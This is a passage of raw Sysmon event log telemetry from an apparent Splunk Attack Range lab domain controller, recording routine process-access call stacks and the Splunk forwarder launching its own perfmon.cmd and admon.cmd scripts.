Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.660{59A5CD1D-8E5C-6005-6500-00000000A301}3756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6400-00000000A301}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6400-00000000A301}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6400-00000000A301}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.550{59A5CD1D-8E5C-6005-6400-00000000A301}3520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6300-00000000A301}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6300-00000000A301}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6300-00000000A301}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program 